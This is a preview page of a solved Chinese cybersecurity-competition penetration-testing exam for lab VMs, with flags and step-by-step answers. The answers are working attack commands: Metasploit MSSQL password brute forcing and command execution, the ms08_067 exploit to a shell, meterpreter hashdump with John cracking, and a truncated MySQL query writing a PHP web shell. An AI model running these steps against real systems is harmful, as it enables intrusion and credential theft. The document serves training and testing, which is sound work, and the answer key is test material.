网络空间安全竞赛单兵渗透试题解析_第1页
网络空间安全竞赛单兵渗透试题解析_第2页
网络空间安全竞赛单兵渗透试题解析_第3页
网络空间安全竞赛单兵渗透试题解析_第4页
网络空间安全竞赛单兵渗透试题解析_第5页
已阅读5页,还剩3页未读 继续免费阅读

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

ARP扫描渗透测试1.11.通过本地PC中渗透测试平台BT5对服务器场景serv2003进行ARP扫描渗透测试(使用工具arping,发送请求数据包数量为5个),并将该操作使用命令的参数字符串作为Flag提交;(16分)完整操作 arping–c5192.168.X.X答案flag -c1.2通过本地PC中渗透测试平台BT5对服务器场景serv2003进行ARP扫描渗透测试(使用工具arping,发送请求数据包数量为5个),并将该操作结果的最后1行,从左边数第2个数字作为Flag提交;(17分)完整操作 arping–c5192.168.X.X答案flag 51.3通过本地PC中渗透测试平台BT5对服务器场景serv2003行ARP扫描渗透测试(使用工具Metasploit中arp_sweep模块),并将工具Metasploit中arp_sweep模块存放路径字符串作为Flag(形式:字符串1/字符串2/字符串3/…/字符串n)提交;(16分)完整操作 msfconsole;searcharp_sweep;答案flag auxiliary/scanner/discovery/arp_sweep1.4通过本地PC中渗透测试平台BT5对服务器场景serv2003进行ARP扫描渗透测试(使用工具Metasploit中arp_sweep模块),假设目标服务器场景serv2003在线,请将工具Metasploit中arp_sweep模块运行显示结果的最后1行的最后1个单词作为Flag提交;(17分)完整操作useauxiliary/scanner/discovery/arp_sweep;showoptions;setrhosts192.168.x.x;run/exploit答案flagcompleted1.5通过本地PC中渗透测试平台BT5对服务器场景serv2003进行ARP扫描渗透测试(使用工具Metasploit中arp_sweep模块),假设目标服务器场景serv2003在线,请将工具Metasploit中arp_sweep模块运行显示结果的第1行出现的IP地址右边的第1个单词作为Flag提交;(16分)完整操作答案flagappears(呈现-开机)invalid(不能识别-关机)1.6通过本地PC中渗透测试平台BT5对服务器场景serv2003进行ARP扫描渗透测试(使用工具Metasploit中arp_sweep模块),假设目标服务器场景serv2003在线,请将工具Metasploit中arp_sweep模块的运行命令字符串作为Flag提交。(18分)完整操作答案flagrun或者exploitMSSQL数据库渗透测试(100分)2.1在本地PC渗透测试平台BT5中使用zenmap工具扫描服务器场景serv2003所在网段(例如:/24)范围内存活的主机IP地址和指定开放的1433、3306、80端口。并将该操作使用的命令中必须要使用的字符串作为FLAG提交;(10分)完整操作zenmap;目标00/24;命令nmap-p1433,3306,80-T4-A-v00/24答案flag -p1433,3306,802.2通过本地PC中渗透测试平台BT5对服务器场景serv2003进行系统服务及版本扫描渗透测试,并将该操作显示结果中mssql数据库服务对应的服务端口信息作为FLAG提交;(10分)完整操作 nmap-sV00答案flag 1433/tcp2.3在本地PC渗透测试平台BT5中使用MSF中模块对其爆破,使用search命令,并将扫描弱口令模块的名称作为FLAG提交;(10分)完整操作msfconsole;searchmssql_login;答案flag mssql_login2.4.在上一题的基础上使用命令调用该模块,并查看需要配置的信息(使用showoptions命令),将回显中需要配置的目标地址,密码使用的猜解字典,线程,账户配置参数的字段作为FLAG提交(之间以英文逗号分隔,例hello,test,..,..);(10分)完整操作showoptions答案flag RHOSTS,PASS_FILE,THREADS,USERNAME2.5在msf模块中配置目标靶机IP地址,将配置命令中的前两个单词作为FLAG提交;(10分)完整操作setRHOSTS192.168.X.X答案flag setRHOSTS2.6登陆靶机共享,将共享文件夹password里的passwordList.txt下载到攻击机BT5本地,在msf模块中指定密码字典,字典路径为/root/passwordList.txt爆破获取密码并将得到的密码作为FLAG提交;(14分)完整操作我们这里做的时候先自己创建字典文件,再爆破。先用vim/root/use.txt创建用户名字典输入常见用户名,admin,administrator,root,toor,sa(每个单词占一行);再vim/root/pass.txt创建密码字典,输入常见密码,1234,tbb,tbb123,88888,999999,123456(注意字典中必须有一个用户名和密码是正确的,才能爆破)msf5auxiliary(scanner/mssql/mssql_login)>setuser_file/root/use.txtuser_file=>/root/use.txtmsf5auxiliary(scanner/mssql/mssql_login)>setpass_file/root/pass.txtpass_file=>/root/pass.txtmsf5auxiliary(scanner/mssql/mssql_login)>run仔细看结果LoginSuccessful:为成功的进入[-]:1433-:1433-LOGINFAILED:WORKSTATION\sa:tbb8342tbb(Incorrect:)[+]:1433-:1433-LoginSuccessful:WORKSTATION\sa:123456[-]:1433-:1433-LOGINFAILED:WORKSTATION\toor:tbb(Incorrect:)答案flag 1234562.7在msf模块中切换新的渗透模块,对服务器场景serv2003进行数据库服务扩展存储过程进行利用,将调用该模块的命令作为FLAG提交;(14分)完整操作searshmssql_exec答案flag useauxiliary/admin/mssql/mssql_exec2.8在上一题的基础上,使用第6题获取到的密码并进行提权,同时使用showoptions命令查看需要的配置,并配置CMD参数来查看系统用户,将配置CMD参数的命令作为FLAG提交;(14分)完整操作msf5auxiliary(scanner/mssql/mssql_login)>useauxiliary/admin/mssql/mssql_execmsf5auxiliary(admin/mssql/mssql_exec)>showoptionsmsf5auxiliary(admin/mssql/mssql_exec)>setPASSWORD123456PASSWORD=>123456msf5auxiliary(admin/mssql/mssql_exec)>setCMDcmd.exe/cnetuser答案flag setCMDcmd.exe/cnetuser2.9在利用msf模块获取系统权限并查看目标系统的异常(黑客)用户,并将该用户作为FLAG提交。(8分)完整操作接上题操作setcmdcmd.exe/c'mdc:\aaaa111';run;可在目标机C盘建立文件夹(通过sql漏洞提权,可执行一切操作,可怕)答案flag Hacker主机发现与信息收集3.1通过本地PC中渗透测试平台BT5使用fping对服务器场景serv2003所在网段(例如:/24)进行主机发现扫描,并将该操作使用的命令中必须要使用的参数作为FLAG提交;(12分)完整操作fping–g192.168.x.x答案flag -g3.2通过本地PC中渗透测试平台BT5使用genlist对服务器场景serv2003所在网段进行扫描进行主机存活发现,并将该操作使用的命令中必须要使用的参数作为FLAG提交;(12分)完整操作 genlist-s192.168.1.*答案flag -s3.3在通过本地PC中渗透测试平台BT5使用nbtscan对服务器场景serv2003所在网段进搜索扫描,获取目标的MAC地址等信息,并将该操作使用的命令中必须要使用的参数作为FLAG提交;(12分)完整操作完整操作 nbtscan–r/24答案flag -r3.4假设服务器场景serv2003设置了防火墙无法进行ping检测,通过PC中渗透测试平台BT5使用arping检测主机连通性扫描(发送请求数据包数量为4个),并将该操作使用的命令中固定不变的字符串作为FLAG提交;(12分)完整操作 arping–c410答案flag arping-c43.5通过本地PC中渗透测试平台BT5使用fping对服务器场景serv2003所在网段进行存活性扫描,且要把最终扫描的存活主机输出到文件ip.txt中,并将该操作使用的命令中必须要使用的参数作为FLAG提交(各参数之间用英文逗号分割,注意题目要求的先后顺序,例a,b);(12分)完整操作fping10–g–a–Labc.txt答案flag -g,-a3.6通过本地PC中渗透测试平台BT5使用nbtscan从第5题的ip.txt文件中读取IP扫描主机信息MAC地址等信息,并将该操作使用的命令中固定不变的字符串作为FLAG提交;(12分)完整操作 nbtscan–fip.txt答案flag nbtscan–f3.7 通过本地PC中渗透测试平台BT5使用xprobe2对服务器场景serv2003进行TCP扫描,仅扫描靶机80,3306端口的开放情况(端口之间以英文格式下逗号分隔),并将该操作使用的命令中固定不变的字符串作为FLAG提交;(12分)完整操作 Xprobe2-T80,330610答案flag xprobe2–T80,33063.8过本地PC中渗透测试平台BT5使用xprobe2对服务器场景serv2003进行UDP扫描,仅扫描靶机161,162端口的开放情况(端口之间以英文格式下逗号分隔),并将该操作使用的命令中固定不变的字符串作为FLAG提交。(16分)完整操作 xprobe2–U161,16210答案flag xprobe2–U161,162完整操作Windows操作系统渗透测试(100分)1.通过本地PC中渗透测试平台Kali对服务器场景BJST进行操作系统扫描渗透测试,并将该操作显示结果“Running:”之后的字符串作为FLAG提交;(6分)完整操作 nmap-sV-O192.168.x.x 答案flag MicrosoftWindowsXP4.2通过本地PC中渗透测试平台Kali对服务器场景BJST进行系统服务及版本扫描渗透测试,并将该操作显示结果中445端口对应的服务版本信息字符串作为FLAG提交;(6分)完整操作 nmap-sV-O192.168.x.x答案flag MicrosoftWindowsXPmicrosoft-ds4.3通过本地PC中渗透测试平台Kali对服务器场景BJST进行渗透测试,将该场景网络连接信息中的DNS信息作为FLAG提交;(例如14)(13分)完整操作msfconsole;useexploit/windows/smb/ms08_067_netapi;setrhosts192.168.x.x;run;shell;ipconfig/all答案flag64.4通过本地PC中渗透测试平台Kali对服务器场景BJST进行渗透测试,将该场景桌面上111文件夹中唯一一个后缀为.docx文件的文件名称作为FLAG提交;(14分)完整操作:在XP桌面222下新建015935f97dc60c9818cbda280e23e1a3b693d67d.docx文件,内容52d7b44f256e6431e9b9248884294d13c6c38c12接上题Kalimsf;shell;C:\DocumentsandSettings\Administrator\Desktop\111;dir答案flag 015935f97dc60c9818cbda280e23e1a3b693d67d4.5完整操作接上题kali操作;exit到meterpreter>;cdc:/;ls;cd"DocumentsandSettings";ls;cdAdministrator;ls;cdDesktop;ls;cd111;ls;download015935f97dc60c9818cbda280e23e1a3b693d67d.docx./;打开新终端ls;vim015935f97dc60c9818cbda280e23e1a3b693d67d.docx;复制文件内容答案flag 52d7b44f256e6431e9b9248884294d13c6c38c124.6完整操作:在XP桌面222下新建图像文件,图像中输入SecurityLife;接上题Kalimsf操作;cd../;cd222;ls;download222.bmp./;点kali窗口位置主文件夹,双击图像文件答案flag SecurityLife4.7通过本地PC中渗透测试平台Kali对服务器场景BJST进行渗透测试,将该场景中的当前最高账户管理员的密码作为FLAG提交;(10分)完整操作 接上题meterpreter>hashdump(复制帐号及密码);vim新建pass.txt(编辑菜单下粘贴);john--format=NT./pass.txt答案flag toor1234.8通过本地PC中渗透测试平台Kali对服务器场景BJST进行渗透测试,将该场景中回收站内文件的文档内容作为FLAG提交。(20分)完整操作答案flag 089f4e36079ef2742d5efc7def5a5bf5768f6c6e5Linux操作系统渗透测试5.1通过本地PC中渗透测试平台Kali对服务器场景CentOS5.5进行操作系统扫描渗透测试,并将该操作显示结果“OSDetails:”之后的字符串作为FLAG提交;(6分)完整操作 nmap-Oip答案flag Linux2.6.9-2.6.305.2通过本地PC中渗透测试平台Kali对服务器场景CentOS5.5进行系统服务及版本扫描渗透测试,并将该操作显示结果中MySQL数据库对应的服务版本信息字符串作为FLAG提交;(6分)完整操作在centos中安装mysqlyum-yinstall

mysqlmysql-servermysql-devel;开户服务servicemysqldstart;关闭防火墙setenforce0;iptables-FKalinamp-O-sVIP地址答案flag MySQL5.0.775.3.通过本地PC中渗透测试平台Kali对服务器场景CentOS5.5进行渗透测试,将该场景/var/www/html目录中唯一一个后缀为.html文件的文件名称作为FLAG提交;(12分)完整操作 CentOS开mysq远程访问,详细设置请看“CentOS下的Mysql的安装和使用”Kali登录mysqlmysql-h91-uroot-p;select'<?phpsystem($_GET

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

评论

0/150

提交评论